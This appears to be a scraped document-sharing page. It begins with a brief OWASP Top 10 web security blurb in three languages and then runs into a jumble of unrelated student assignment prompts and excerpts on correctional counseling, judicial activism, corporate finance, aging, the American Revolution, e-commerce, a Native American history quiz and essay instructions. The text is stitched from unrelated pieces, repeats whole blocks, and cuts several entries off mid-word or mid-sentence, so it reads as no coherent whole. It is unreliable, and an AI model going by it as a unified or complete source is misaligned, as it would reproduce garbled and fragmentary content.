OWASP Top 10 Most Critical Web Application Security Risks
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code. More info at: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
OWASP Top 10 Most Critical Web Application Security Risks
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code. More info at: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
La OWASP Top Ten fornisce un potente documento di sensibilizzazione per la sicurezza delle applicazioni web. La OWASP Top Ten rappresenta un ampio consenso su ciò che le falle di sicurezza delle applicazioni web più critiche sono. I membri del progetto includono una varietà di esperti di sicurezza di tutto il mondo che hanno condiviso la loro esperienza per produrre questo elenco.
L'objectif du Top Ten de l'OWASP est d'informer et d'évangéliser les responsables de la sécurité des systèmes d'information sur les risques encourus lors de publication d'application sur le net.
· Describe strategies to build rapport with inmates and offenders .docxgerardkortney
· Describe strategies to build rapport with inmates and offenders in a correctional treatment or supervision program.
· Describe the effect of group dynamics on facilitating programs.
· Describe techniques for establishing a therapeutic environment.
Generalist Case Management
Woodside and McClam
https://phoenix.vitalsource.com/books/9781483342047/pageid/44
https://phoenix.vitalsource.com/#/books/9781323128800
https://phoenix.vitalsource.com/#/books/9781483342047
https://phoenix.vitalsource.com/#/books/9781133795247
https://phoenix.vitalsource.com/#/books/1259760413
Use book and two outside sources.
At least 100 words per question
THANKS
1 The Role of the Correctional Counselor CHAPTER OBJECTIVES After reading this chapter, you will be able to: 1. Identify the functions and parameters of the counseling process. 2. Discuss the competing interests between security and counseling in the correctional counseling process. 3. Know common terms and concerns associated with custodial corrections. 4. Understand the role of the counselor as facilitator. 5. Identify the various personal characteristics associated with effective counselors. 6. Be aware of the impact that burnout can have on a counselor’s professional performance. 7. Identify the various means of training and supervision associated with counseling. PART ONE: A BRIEF INTRODUCTION TO COUNSELING AND CORRECTIONS There are many myths concerning the concept of counseling. Although the image of the counseling field has changed dramatically over the past two or three decades, much of society still views counseling and therapy as a mystic process reserved for those who lack the ability to handle life issues effectively. While the concept of counseling is often misunderstood, the problem is exacerbated when attempting to introduce the idea of correctional counseling. Therefore, the primary goal of this chapter is to provide a working definition of correctional counseling that includes descriptions of how and when it is carried out. In order to understand the concept of correctional counseling, however, the two words that derive the concept must first be defined: “corrections” and “counseling.” In addition, a concerted effort is made to identify the myriad of legal and ethical issues that pertain to counselors working with offenders. It is very difficult to identify a single starting point for the counseling profession. In essence, there were various movements occurring simultaneously that later evolved into what we now describe as counseling. One of the earliest connections to the origins of counseling took place in Europe during the Middle Ages (Brown & Srebalus, 2003). The primary objective was assisting individuals with career choices. This type of counseling service is usually described by the concept of “guidance.” In the late 1800s Wilhelm Wundt and G. Stanley Hall created two of the first known psychological laboratories aimed at studying and treating individuals with psychological and e.
· Debates continue regarding what constitutes an appropriate rol.docxgerardkortney
· Debates continue regarding what constitutes an appropriate role for the judiciary. Some argue that federal judges have become too powerful and that judges “legislate from the bench.”
1. What does it mean for a judge to be an activist?
2. What does it mean for a judge to be a restrainist?
· Although conservatives had long complained about the activism of liberal justices and judges, in recent years conservative judges and justices have been likely to overturn precedents and question the power of elected institutions of government.
3. When is judicial activism appropriate? Explain.
· To defenders of the right to privacy, it is implicitly embodied in the Constitution in the First, Fourth, Fifth, Ninth, and Fourteenth Amendments. To opponents, it is judge-made law because there is no explicit reference to it under the Constitution. The right to privacy dates back to at least 1890, when Boston attorneys Samuel Warren and Louis Brandeis equated it with the right to be left alone from journalists who engaged in yellow journalism.
4. In short, do you believe a right to privacy exists in the federal Constitution. Why or why not?
.
More Related Content
Similar to OWASP Top 10 - 2017The Ten Most Critical Web Application Sec.docx
La OWASP Top Ten fornisce un potente documento di sensibilizzazione per la sicurezza delle applicazioni web. La OWASP Top Ten rappresenta un ampio consenso su ciò che le falle di sicurezza delle applicazioni web più critiche sono. I membri del progetto includono una varietà di esperti di sicurezza di tutto il mondo che hanno condiviso la loro esperienza per produrre questo elenco.
L'objectif du Top Ten de l'OWASP est d'informer et d'évangéliser les responsables de la sécurité des systèmes d'information sur les risques encourus lors de publication d'application sur le net.
· Describe strategies to build rapport with inmates and offenders .docxgerardkortney
· Describe strategies to build rapport with inmates and offenders in a correctional treatment or supervision program.
· Describe the effect of group dynamics on facilitating programs.
· Describe techniques for establishing a therapeutic environment.
Generalist Case Management
Woodside and McClam
https://phoenix.vitalsource.com/books/9781483342047/pageid/44
https://phoenix.vitalsource.com/#/books/9781323128800
https://phoenix.vitalsource.com/#/books/9781483342047
https://phoenix.vitalsource.com/#/books/9781133795247
https://phoenix.vitalsource.com/#/books/1259760413
Use book and two outside sources.
At least 100 words per question
THANKS
1 The Role of the Correctional Counselor CHAPTER OBJECTIVES After reading this chapter, you will be able to: 1. Identify the functions and parameters of the counseling process. 2. Discuss the competing interests between security and counseling in the correctional counseling process. 3. Know common terms and concerns associated with custodial corrections. 4. Understand the role of the counselor as facilitator. 5. Identify the various personal characteristics associated with effective counselors. 6. Be aware of the impact that burnout can have on a counselor’s professional performance. 7. Identify the various means of training and supervision associated with counseling. PART ONE: A BRIEF INTRODUCTION TO COUNSELING AND CORRECTIONS There are many myths concerning the concept of counseling. Although the image of the counseling field has changed dramatically over the past two or three decades, much of society still views counseling and therapy as a mystic process reserved for those who lack the ability to handle life issues effectively. While the concept of counseling is often misunderstood, the problem is exacerbated when attempting to introduce the idea of correctional counseling. Therefore, the primary goal of this chapter is to provide a working definition of correctional counseling that includes descriptions of how and when it is carried out. In order to understand the concept of correctional counseling, however, the two words that derive the concept must first be defined: “corrections” and “counseling.” In addition, a concerted effort is made to identify the myriad of legal and ethical issues that pertain to counselors working with offenders. It is very difficult to identify a single starting point for the counseling profession. In essence, there were various movements occurring simultaneously that later evolved into what we now describe as counseling. One of the earliest connections to the origins of counseling took place in Europe during the Middle Ages (Brown & Srebalus, 2003). The primary objective was assisting individuals with career choices. This type of counseling service is usually described by the concept of “guidance.” In the late 1800s Wilhelm Wundt and G. Stanley Hall created two of the first known psychological laboratories aimed at studying and treating individuals with psychological and e.
· Debates continue regarding what constitutes an appropriate rol.docxgerardkortney
· Debates continue regarding what constitutes an appropriate role for the judiciary. Some argue that federal judges have become too powerful and that judges “legislate from the bench.”
1. What does it mean for a judge to be an activist?
2. What does it mean for a judge to be a restrainist?
· Although conservatives had long complained about the activism of liberal justices and judges, in recent years conservative judges and justices have been likely to overturn precedents and question the power of elected institutions of government.
3. When is judicial activism appropriate? Explain.
· To defenders of the right to privacy, it is implicitly embodied in the Constitution in the First, Fourth, Fifth, Ninth, and Fourteenth Amendments. To opponents, it is judge-made law because there is no explicit reference to it under the Constitution. The right to privacy dates back to at least 1890, when Boston attorneys Samuel Warren and Louis Brandeis equated it with the right to be left alone from journalists who engaged in yellow journalism.
4. In short, do you believe a right to privacy exists in the federal Constitution. Why or why not?
.
· Critical thinking paper · · · 1. A case study..docxgerardkortney
· Critical thinking paper
·
·
· 1.
A case study.
Deborah Shore, aged 45, works for a small corporation in the Research and Development department.
When she first became a member of the department 15 years ago, Deborah was an unusually creative and productive researcher; her efforts quickly resulted in raises and promotions within the department and earned her the respect of her colleagues. Now, Deborah finds herself less interested in doing research; she is no longer making creative contributions to her department, although she is making contributions to its administration.
She is still respected by the coworkers who have known her since she joined the firm, but not by her younger coworkers.
Analyze the case study from the psychoanalytic, learning, and contextual perspectives: how would a theorist from each perspective explain Deborah's development? Which perspective do you believe provides the most adequate explanation, and why?
2. Interview your mother (and grandmothers, if possible), asking about experiences with childbirth. Include your own experiences if you have had children. Write a paper summarizing these childbirth experiences and comparing them with the contemporary experiences described in the text.
3. Identify a "type" of parent (e.g., single parent, teenage parent, low-income parent, dual-career couple) who is most likely to be distressed because an infant has a "difficult" temperament. Explain why you believe that this type of parent would have particular problems with a difficult infant. Write an informational brochure for the selected type of parent. The brochure should include an explanation of temperament in general and of the difficult temperament in particular, and give suggestions for parents of difficult infants.
4. Plan an educational unit covering nutrition, health, and safety for use with preschoolers and kindergartners. Take into account young children's cognitive and linguistic characteristics. The project should include (1) an outline of the content of the unit; and (2) a description of how the content would be presented, given the intellectual abilities of preschoolers. For example, how long would each lesson be? What kinds of pictures or other audiovisual materials would be used? How would this content be integrated with the children's other activities in preschool or kindergarten?
5. Visit two day care centers and evaluate each center using the information from the text as a guide. Request a fee schedule from each center. Write a paper summarizing your evaluation of each center.
Note:
Unless you are an actual potential client of the center, contact the director beforehand to explain the actual purpose of the visit, obtain permission to visit, and schedule your visit so as to minimize disruption to the center's schedule.
6. Watch some children's television programs and advertising, examine some children's toys and their packaging, read some children's books, and listen to some children's recor.
· Coronel & Morris Chapter 7, Problems 1, 2 and 3
· Coronel & Morris Chapter 8, Problems 1 and 2
A People’s History of Modern Europe
“A fascinating journey across centuries towards the world as we experience it today. ... It is
the voice of the ordinary people, and women in particular, their ideas and actions, protests
and sufferings that have gone into the making of this alternative narrative.”
——Sobhanlal Datta Gupta, former Surendra Nath Banerjee
Professor of Political Science, University of Calcutta
“A history of Europe that doesn’t remove the Europeans. Here there are not only kings,
presidents and institutions but the pulse of the people and social organizations that shaped
Europe. A must-read.”
——Raquel Varela, Universidade Nova de Lisboa
“Lively and engaging. William A Pelz takes the reader through a thousand years of
European history from below. This is the not the story of lords, kings and rulers. It is the
story of the ordinary people of Europe and their struggles against those lords, kings and
rulers, from the Middle Ages to the present day. A fine introduction.”
——Francis King, editor, Socialist History
“This book is an exception to the rule that the winner takes all. It highlights the importance
of the commoners which often is only shown in the dark corners of mainstream history
books. From Hussites, Levellers and sans-culottes to the women who defended the Paris
Commune and the workers who occupied the shipyards during the Carnation revolution in
Portugal. The author gives them their deserved place in history just like Howard Zinn did
for the American people.”
——Sjaak van der Velden, International Institute of Social History, Amsterdam
“The author puts his focus on the lives and historical impact of those excluded from
power and wealth: peasants and serfs of the Middle Ages, workers during the Industrial
Revolution, women in a patriarchic order that transcended different eras. This focus not
only makes history relevant for contemporary debates on social justice, it also urges the
reader to develop a critical approach.”
——Ralf Hoffrogge, Ruhr-Universität Bochum
“An exciting story of generations of people struggling for better living conditions, and for
social and political rights. ... This story has to be considered now, when the very notions of
enlightenment, progress and social change are being questioned.”
——Boris Kagarlitsky, director of Institute for globalization studies and social
movements, Moscow, and author of From Empires to Imperialism
“A splendid antidote to the many European histories dominated by kings, businessmen
and generals. It should be on the shelves of both academics and activists ... A lively and
informative intellectual tour-de-force.”
——Marcel van der Linden, International Institute of Social History, Amsterdam
A People’s History
of Modern Europe
William A. Pelz
First published 2016 by Pluto Press
345 Archway Road, London N6 5AA
www.pluto.
· Complete the following problems from your textbook· Pages 378.docxgerardkortney
· Complete the following problems from your textbook:
· Pages 378–381: 10-1, 10-2, 10-16, and 10-20.
· Pages 443–444: 12-7 and 12-9.
· Page 469: 13-5.
· 10-1 How would each of the following scenarios affect a firm’s cost of debt, rd(1 − T); its cost of equity, rs; and its WACC? Indicate with a plus (+), a minus (−), or a zero (0) whether the factor would raise, lower, or have an indeterminate effect on the item in question. Assume for each answer that other things are held constant, even though in some instances this would probably not be true. Be prepared to justify your answer but recognize that several of the parts have no single correct answer. These questions are designed to stimulate thought and discussion.
Effect on
rd(1 − T)
rs
WACC
a. The corporate tax rate is lowered.
__
__
__
b. The Federal Reserve tightens credit.
__
__
__
c. The firm uses more debt; that is, it increases its debt ratio.
__
__
__
d. The dividend payout ratio is increased.
__
__
__
e. The firm doubles the amount of capital it raises during the year.
__
__
__
f. The firm expands into a risky new area.
__
__
__
g. The firm merges with another firm whose earnings are countercyclical both to those of the first firm and to the stock market.
__
__
__
h. The stock market falls drastically, and the firm’s stock price falls along with the rest.
__
__
__
i. Investors become more risk-averse.
__
__
__
j. The firm is an electric utility with a large investment in nuclear plants. Several states are considering a ban on nuclear power generation.
__
__
__
· 10-2 Assume that the risk-free rate increases, but the market risk premium
· 10-16COST OF COMMON EQUITY The Bouchard Company’s EPS was $6.50 in 2018, up from $4.42 in 2013. The company pays out 40% of its earnings as dividends, and its common stock sells for $36.00.
· a. Calculate the past growth rate in earnings. (Hint: This is a 5-year growth period.)
· b. The last dividend was D0 = 0.4($6.50) = $2.60. Calculate the next expected dividend, D1, assuming that the past growth rate continues.
· c. What is Bouchard’s cost of retained earnings, rs?
· 10-20WACC The following table gives Foust Company’s earnings per share for the last 10 years. The common stock, 7.8 million shares outstanding, is now (1/1/19) selling for $65.00 per share. The expected dividend at the end of the current year (12/31/19) is 55% of the 2018 EPS. Because investors expect past trends to continue, g may be based on the historical earnings growth rate. (Note that 9 years of growth are reflected in the 10 years of data.)
The current interest rate on new debt is 9%; Foust’s marginal tax rate is 40%, and its target capital structure is 40% debt and 60% equity.
· a. Calculate Foust’s after-tax cost of debt and common equity. Calculate the cost of equity as rs = D1/P0 + g.
· b. Find Foust’s WACC
· 12-7SCENARIO ANALYSIS Huang Industries is considering a proposed project whose estimated NPV is $12 million. This estimate assumes that economic conditions wi.
· Consider how different countries approach aging. As you consid.docxgerardkortney
· Consider how different countries approach aging. As you consider different countries, think about the following:
o Do older adults live with their children, or are they more likely to live in a nursing home?
o Are older adults seen as wise individuals to be respected and revered, or are they a burden to their family and to society?
· Next, select two different countries and compare and contrast their approaches to aging.
· Post and identify each of the countries you selected. Then, explain two similarities and two differences in how the countries approach aging. Be specific and provide examples. Use proper APA format and citation. LSW10
.
· Clarifying some things on the Revolution I am going to say som.docxgerardkortney
· Clarifying some things on the Revolution
I am going to say something, and I want you to hear me.
I am a scholar of the Revolution. That's the topic of my dissertation. Please believe me when I say that I know a lot about it.
I also happen to know--and this is well-supported by historians--that the Revolution was a civil war in which, for the first several years, Revolutionaries and Loyalists were evenly matched.
I will repeat that. Evenly matched. Loyalists were not merely too cowardly to fight, and they were not old fogies who hated the idea of freedom. Most had been in the Colonies for generations. Many of them took up arms for their King and their country. And when they lost, you confiscated their homes and they fled with the clothes on their back to Canada, England, and other places of the Empire. Both sides--both sides--committed unspeakable atrocities against civilians whom they disagreed with.
Now, a lot of you love to repeat some very fervent patriotic diatribe about how great the Revolution was. That's not history. That's propaganda. Know the difference.
History has shades of gray. History is complex and ambiguous. Washington, for instance, wore dentures made from the teeth of his slaves. Benjamin Franklin's son was the last royal governor of New Jersey. Did you know that the net tax rate for Americans--they always conveniently leave this out of the textbooks--was between 1.9 and 2.1%, depending on colony.? And that was if they had paid the extra taxes on tea and paper.
And, wait for it, people who support California independence use the same logic and arguments as they did in 1775. Did you know that the Los Angeles and Washington are only a few hundred miles closer than Boston and London? That many of the same issues, point by point, are repeating here in California? So put yourself in those shoes. How many of you would have sided with the Empire (whether American or British) based on the fact that you don't know how this will shake out? Would you call someone who supports Calexit a Patriot? Revolutionary? Nutcase? Who gets to own that word, anyway?
You can choose that you would have supported the revolutionaries--but think. Think about the other side. They matter, and their experiences got to be cleansed out of history to make you feel better about the way the revolutionaries behaved during the War. Acknowledge that they are there, and that their point of view has merit, even if you not agree with it.
· Clarifying Unit III's assignment
I have noticed a few consistent problems with the letter in the Unit III issue. Here are some pointers to make it better.
1. Read the clarifying note I wrote above. Note that the taxes aren't actually as high as you have been led to believe, but the point is that they should not be assigned at all without your consent.
2. Acknowledge that this is a debate, that a certain percentage are radicalized for independence, but there are is also a law-and-order group who find this horrific, and want .
· Chapter 9 – Review the section on Establishing a Security Cultur.docxgerardkortney
· Chapter 9 – Review the section on Establishing a Security Culture. Review the methods to reduce the chances of a cyber threat noted in the textbook. Research other peer-reviewed source and note additional methods to reduce cyber-attacks within an organization.
· Chapter 10 – Review the section on the IT leader in the digital transformation era. Note how IT professionals and especially leaders must transform their thinking to adapt to the constantly changing organizational climate. What are some methods or resources leaders can utilize to enhance their change attitude?
.
· Chapter 10 The Early Elementary Grades 1-3The primary grades.docxgerardkortney
· Chapter 10: The Early Elementary Grades: 1-3
The primary grades are grades 1-3.
Although educational reform has had an effect on all children, it is most apparent in the early elementary years. Reform and change comes from a number of sources and the chapter begins by reminding you of this. Let’s examine a few of these sources...
Diversity. There has been a rise in the number of racial and ethnic minority students enrolled in the nation's public schools; this number will (most likely) continue to rise. Teaching children from different cultures and backgrounds is an important piece to account for when planning curriculum.
Standards. Standards is a reason for reform. We've already looked at standards; these are something you must keep in mind when planning lessons.
Data-Driven Instruction may sound new, but it is not a new concept to you. We’ve done a great deal of discussing the outcomes of test-taking and assessments. You've probably all heard "teaching to the test."
Technology. Today’s students have had much experience with technology, therefore, it’s important to provide them with opportunities to learn with technology. It may take a while for you to be creative and think of ways to use it in your teaching (if you haven’ t been).
Health and Wellness. Obesity is a major concern in this country. Therefore, it is important to make sure that children have the opportunity to be active. Unfortunately, due to the pressure of academics, many schools have been taking physical education/activity time out of the curriculum.
Violence: One issue that I notice this new edition of the text has excluded is violence. However, I think that this topic is important; we need to keep children safe when they are at school. As a result of 9/11 (and, not to mention that many violent events have happened on school campuses in recent years), many school districts now have an emergency system in place that they can easily use if there is any type of incident in which the children’s safety is at risk.
WHAT ARE CHILDREN IN GRADES ONE TO THREE LIKE?
Your text explains that the best way to think of a child’s development during this time is: slow and steady. During this stage, there is not much difference between boys and girls when it comes to physical capabilities. Although it is always important to not stereotype based on one’s gender, it is especially important during these years. These children are also entering into their "tween" years, thus; being sensitive to the children's and parents' needs in regards to such changes is important.
It is important to remember that children in the primary grades are in the Concrete Operations Stage. This stage is children ages 7 to 12. The term operation refers to an action that can be carried out in thought as well as executed materially and that is mentally and physically reversible.
These children are at an age in which they can compare their abilities to their peers. And, therefore, children may develop learned helplessnes.
· Chap 2 and 3· what barriers are there in terms of the inter.docxgerardkortney
· Chap 2 and 3
· what barriers are there in terms of the interpersonal communication model?
Typically, communication breakdowns result from lack of understanding without clarification; often, there wasn't even an attempt at clarification. If barriers to interpersonal communication are not acknowledged and addressed, workplace productivity can suffer.
Language Differences
Interpersonal communication can go awry when the sender and receiver of the message speak a different language -- literally and figuratively. Not everyone in the workplace will understand slang, jargon, acronyms and industry terminology. Instead of seeking clarification, employees might guess at the meaning of the message and then act on mistaken assumptions. Also, misunderstandings may occur among workers who do not speak the same primary language. As a result, feelings may be hurt, based on misinterpretation of words or of body language.
Cultural Differences
Interpersonal communication may be adversely affected by lack of cultural understanding, mis-perception, bias and stereotypical beliefs. Workers may have limited skill or experience communicating with people from a different background. Many companies offer diversity training to help employees understand how to communicate more effectively across cultures and relate to those who may have different background experiences. Similarly, gender barriers can obstruct interpersonal communication if men and women are treated differently, and held to different standards, causing interpersonal conflicts in the workplace.
Personality Differences
Like any skill, some people are better at interpersonal communication than others. Personality traits also influence how well an individual interacts with subordinates, peers and supervisors. Extraversion can be an advantage when it comes to speaking out, sharing opinions and disseminating information. However, introverts may have the edge when it comes to listening, reflecting and remembering. Barriers to interpersonal communication may occur when employees lack self-awareness, sensitivity and flexibility. Such behavior undermines teamwork, which requires mutual respect, compromise and negotiation. Bullying, backstabbing and cut throat competition create a toxic workplace climate that will strain interpersonal relationships.
Generational Differences
Interpersonal communication can be complicated by generational differences in speech, dress, values, priorities and preferences. For instance, there may be a generational divide as to how team members prefer to communicate with one another. If younger workers sit in cubicles, using social networking as their primary channel of communication, it can alienate them from older workers who may prefer face-to-face communication. Broad generalizations and stereotypes can also cause interpersonal rifts when a worker from one generation feels superior to those who are younger or older. Biases against workers based on age can constitute a form of disc.
· Case Study 2 Improving E-Mail Marketing ResponseDue Week 8 an.docxgerardkortney
· Case Study 2: Improving E-Mail Marketing Response
Due Week 8 and worth 160 points
Read the following case study.
A company wishes to improve its e-mail marketing process, as measured by an increase in the response rate to e-mail advertisements. The company has decided to study the process by evaluating all combinations of two (2) options of the three (3) key factors: E-Mail Heading (Detailed, Generic); Email Open (No, Yes); and E-Mail Body (Text, HTML). Each of the combinations in the design was repeated on two (2) different occasions. The factors studied and the measured response rates are summarized in the following table.
Write a two to three (2-3) page paper in which you:
1. Use the data shown in the table to conduct a design of experiment (DOE) in order to test cause-and-effect relationships in business processes for the company.
2. Determine the graphical display tool (e.g., Interaction Effects Chart, Scatter Chart, etc.) that you would use to present the results of the DOE that you conducted in Question 1. Provide a rationale for your response.
3. Recommend the main actions that the company could take in order to increase the response rate of its e-mail advertising. Provide a rationale for your response.
4. Propose one (1) overall strategy for developing a process model for this company that will increase the response rate of its e-mail advertising and obtain effective business process. Provide a rationale for your response.
Your assignment must follow these formatting requirements:
. Be typed, double spaced, using Times New Roman font (size 12), with one-inch margins on all sides; citations and references must follow APA or school-specific format. Check with your professor for any additional instructions.
. Include a cover page containing the title of the assignment, the student’s name, the professor’s name, the course title, and the date. The cover page and the reference page are not included in the required assignment page length.
The specific course learning outcomes associated with this assignment are:
. Build regression models for improving business processes.
. Design experiments to test cause-and-effect relationships in business processes.
. Use technology and information resources to research issues in business process improvement.
. Write clearly and concisely about business process improvement using proper writing mechanics.
Read each discussion 1-4 and then write a 200 word response for each.
With your response, you can either expand on the initial post with similar, formally cited, specific examples or additional information regarding the original example(s) (be sure the additional information isn’t simply a re-statement of what has already been posted) or you can respond with a well-supported (based on formally cited information) counter point.
APA FORMAT
Response should have 1 source for each discussion
1. A message in sports is brought to sports economists in Jeremiah 29:11. This verse states, “For I.
· Briefly describe the technologies that are leading businesses in.docxgerardkortney
· Briefly describe the technologies that are leading businesses into the third wave of electronic commerce.
· In about 100 words, describe the function of the Internet Corporation for Assigned Names and Numbers. Include a discussion of the differences between gTLDs and sTLDs in your answer.
· In one or two paragraphs, describe how the Internet changed from a government research project into a technology for business users.
· In about 100 words, explain the difference between an extranet and an intranet. In your answer, describe when you might use a VPN in either.
· Define “channel conflict” and describe in one or two paragraphs how a company might deal with this issue.
· In two paragraphs, explain why a customer-centric Web site design is so important, yet is so difficult to accomplish.
· In about two paragraphs, distinguish between outsourcing and offshoring as they relate to business processes.
· In about 200 words, explain how the achieved trust level of a company’s communications using blogs and social media compare with similar communication efforts conducted using mass media and personal contact.
· Write a paragraph in which you distinguish between a virtual community and a social networking Web site
· Write two or three paragraphs in which you describe the role that culture plays in the development of a country’s laws and ethical standards.
QUESTION 1
Lakota peoples of the Great Plains are notably:
nomadic and followed the buffalo herds
Sedentary farmers, raising corn, northern beans, and potatoes
peaceful people who tried to live in harmony with neighboring tribes and the environment
religious and employed a variety of psychoactive plants during religious ceremonies
QUESTION 2
Tribal peoples of the Great Plains experienced greater ease at hunting and warfare after the introduction of:
Hotchkiss guns
smokeless gunpowder
horses
Intertribal powwows
all of the above
QUESTION 3
The Apaches and Navajos (Dine’) of the southwestern region of North America speak a language similar to their relatives of northern California and western Canada called:
Yuman
Uto-Aztecan
Tanoan
Athabaskan
Algonkian
QUESTION 4
The Navajo lived in six or eight-sided domed earth dwellings called:
wickiups
kivas
hogans
roadhouses
sweat lodge
QUESTION 5
Pueblo Indians, such as the Zuni and Hopi tribes, are descendants of the ancient people known as the:
Anasazi
Ashkenazi
Athabaskan
Aztecanotewa
Atlantean
2 points
QUESTION 6
1. Kachinas, or spirits of nature, were believed to:
Assist in the growth of crops and send rain
Help defend the Navajo against all foreign invaders
Provide medical assistance to the Hopi when doctors were not available
Combat evil spirits such as Skin-walkers or Diablitos
All of the above
2 points
QUESTION 7
1. The preferred dwellings among the Lakota Sioux were:
wickiups
adobe pueblos
pit houses
teepees
buffalo huts
2 points
QUESTION 8
1. Native Americansbenef.
· Assignment List· My Personality Theory Paper (Week Four)My.docxgerardkortney
· Assignment List
· My Personality Theory Paper (Week Four)
My Personality Theory Paper (Week Four)
DUE: May 31, 2020 11:55 PM
Grade Details
Grade
N/A
Gradebook Comments
None
Assignment Details
Open Date
May 4, 2020 12:05 AM
Graded?
Yes
Points Possible
100.0
Resubmissions Allowed?
No
Attachments checked for originality?
Yes
Top of Form
Assignment Instructions
My Personality Theory Paper
Instructions:
For this assignment, you will write a paper no less than 7 pages in length, not including required cover and Reference pages, describing a single personality theory from the course readings that best explains your own personality and life choices. You are free to select from among the several theories covered in the course to date but only one theory may be used.
Your task is to demonstrate your knowledge of the theory you choose via descriptions of its key concepts and use of them to explain how you developed your own personality. It is recommended that you revisit the material covered to date to refresh your knowledge of theory details. This is a "midterm" assignment and you should show in your work that you have studied and comprehended the first four weeks of course material. Your submission should be double-spaced with 1 inch margins on all sides of each page and should be free of spelling and grammar errors. It must include source crediting of any materials used in APA format, including source citations in the body of your paper and in a Reference list attached to the end. Easy to follow guides to APA formatting can be found on the tutorial section of the APUS Online Library.
Your paper will include three parts:
I. A brief description of the premise and key components of the theory you selected. You should be thorough and concise in this section and not spend the bulk of the paper detailing the theory, but rather just give enough of a summary of the key points so that an intelligent but uniformed reader would be able to understand its basics. If you pick a more complicated theory, you should expect explaining its premise and key components to take longer than explaining the same for one of the simpler theories but, in either case, focus on the basics and keep in mind that a paper that is almost all theory description and little use of the theory described to explain your own personality will receive a significant point deduction as will the reverse case of the paper being largely personal experience sharing with little linkage to clearly described key theory components.
II. A description of how your chosen theory explains your personality and life choices with supporting examples.
III. A description of the limitations of the theory in explaining your personality or anyone else’s.
NOTE: Although only your instructor will be reading your paper, you should still think about how much personal information you want to disclose. The purpose of this paper is not to get you to share private information, but rather to bring one .
· Assignment List
· Week 7 - Philosophical Essay
Week 7 - Philosophical Essay
DUE: Mar 22, 2020 11:55 PM
Grade Details
Grade
N/A
Gradebook Comments
None
Assignment Details
Open Date
Feb 3, 2020 12:05 AM
Graded?
Yes
Points Possible
100.0
Resubmissions Allowed?
No
Attachments checked for originality?
Yes
Top of Form
Assignment Instructions
Objective: Students will write a Philosophical Essay for week 7 based on the course concepts.
Course Objectives: 2, 3, & 4
Task:
This 4 - 5 full page (not to exceed 6 pages) Philosophical Essay you will be writing due Week 7 is designed to be a thoughtful, reflective work. The 4 - 5 full pages does not include a cover page or a works cited page. It will be your premier writing assignment focused on the integration and assessment relating to the course concepts. Your paper should be written based on the outline you submitted during week 4 combined with your additional thoughts and instructor feedback. You will use at least three scholarly/reliable resources with matching in-text citations and a Works Cited page. All essays are double spaced, 12 New Times Roman font, paper title, along with all paragraphs indented five spaces.
Details:
You will pick one of the following topics only to do your paper on:
· According to Socrates, must one heed popular opinion about moral matters? Does Socrates accept the fairness of the laws under which he was tried and convicted? Would Socrates have been wrong to escape?
· Consider the following philosophical puzzle: “If a tree falls in the forest and there's no one around to hear it, does it make a sound?” (1) How is this philosophical puzzle an epistemological problem? And (2) how would John Locke answer it?
· Evaluate the movie, The Matrix, in terms of the philosophical issues raised with (1) skepticism and (2) the mind-body problem. Explain how the movie raises questions similar to those found in Plato’s and Descartes’ philosophy. Do not give a plot summary of the movie – focus on the philosophical issues raised in the movie as they relate to Plato and Descartes.
· Socrates asks Euthyphro, “Are morally good acts willed by God because they are morally good, or are they morally good because they are willed by God?” (1) How does this question relate to the Divine Command Theory of morality? (2) What are the philosophical implications associated with each option here?
· Explain (1) the process by which Descartes uses skepticism to refute skepticism, and (2) what first principle does this lead him to? (3) Explain why this project was important for Descartes to accomplish.
Your paper will be written at a college level with an introduction, body paragraphs, a conclusion, along with in-text citations/Works Cited page in MLA formatting. Students will follow MLA format as the sole citation and formatting style used in written assignments submitted as part of coursework to the Humanities Department. Remember - any resource that is listed on the Works Cited page must .
· Assignment 3 Creating a Compelling VisionLeaders today must be .docxgerardkortney
· Assignment 3: Creating a Compelling Vision
Leaders today must be able to create a compelling vision for the organization. They also must be able to create an aligned strategy and then execute it. Visions have two parts, the envisioned future and the core values that support that vision of the future. The ability to create a compelling vision is the primary distinction between leadership and management. Leaders need to create a vision that will frame the decisions and behavior of the organization and keep it focused on the future while also delivering on the short-term goals.
To learn more about organizational vision statements, do an Internet search and review various vision statements.
In this assignment, you will consider yourself as a leader of an organization and write a vision statement and supporting values statement.
Select an organization of choice. This could be an organization that you are familiar with, or a fictitious organization. Then, respond to the following:
· Provide the name and description of the organization. In the description, be sure to include the purpose of the organization, the products or services it provides, and the description of its customer base.
· Describe the core values of the organization. Why are these specific values important to the organization?
· Describe the benefits and purpose for an organizational vision statement.
· Develop a vision statement for this organization. When developing a vision statement, be mindful of the module readings and lecture materials.
· In the vision statement, be sure to communicate the future goals and aspirations of the organization.
· Once you have developed the vision statement, describe how you would communicate the statement to the organizational stakeholders, that is, the owners, employees, vendors, and customers.
· How would you incorporate the communication of the vision into the new employee on-boarding and ongoing training?
Write your response in approximately 3–5 pages in Microsoft Word. Apply APA standards to citation of sources.
Use the following file naming convention: LastnameFirstInitial_M1_A3.doc. For example, if your name is John Smith, your document will be named SmithJ_M1_A3.doc.
By the due date assigned, deliver your assignment to the Submissions Area.
Assignment 3 Grading Criteria
Maximum Points
Chose and described the organization. The description included the purpose of the organization, the products or services the organization provides, and the description of its customer base.
16
Developed a vision statement for the organization. Ensured to accurately communicate the goals and aspirations of the organization in the vision statement.
24
Ensured that the incorporation and communication strategy for the vision statement is clear, detailed, well thought out and realistic.
28
Evaluated and explained which values are most important to the organization.
24
Wrote in a clear, concise, and organized manner; demonstrated ethical scholarship in accurate r.
· Assignment 4
· Week 4 – Assignment: Explain Theoretical Perspectives for Real-life Scenarios
Assignment
Updated
Top of Form
Bottom of Form
For each of the following three scenarios, use a chart format to assess how each traditional theoretical perspective would best explain the situation that a social worker would need to address. You may create your charts in Word or another software program of your choice. An example chart follows the three scenarios.
Scenario 1
